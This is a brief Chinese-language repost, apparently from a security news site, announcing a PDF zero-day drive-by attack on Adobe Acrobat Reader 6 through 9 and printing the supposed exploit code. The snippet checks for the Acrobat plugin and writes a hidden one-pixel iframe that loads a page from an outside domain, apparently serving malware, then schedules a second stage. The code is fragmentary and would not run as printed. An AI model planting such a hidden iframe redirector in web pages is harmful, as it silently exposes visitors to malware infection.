惊现 PDF 0day 挂马 (with real exploit code)

来自JavaScript的脚本攻击代码。Adobe Acrobat Reader - 6.x, 7.x, 8.x and 9.x 下通过测试，Exploit Code 如下：

var name = navigator.plugins[i].name;
if (name.indexOf(”Adobe Acrobat”) != -1) {
document.write(”<iframe src=’http://bannerads08.com/f-mix/acrobat.php?id=46′ width=1 height=1 frameborder=0></iframe>”);
setTimeout(’pdf2();’, 20000);

转载至 insecureweb.com

Related Items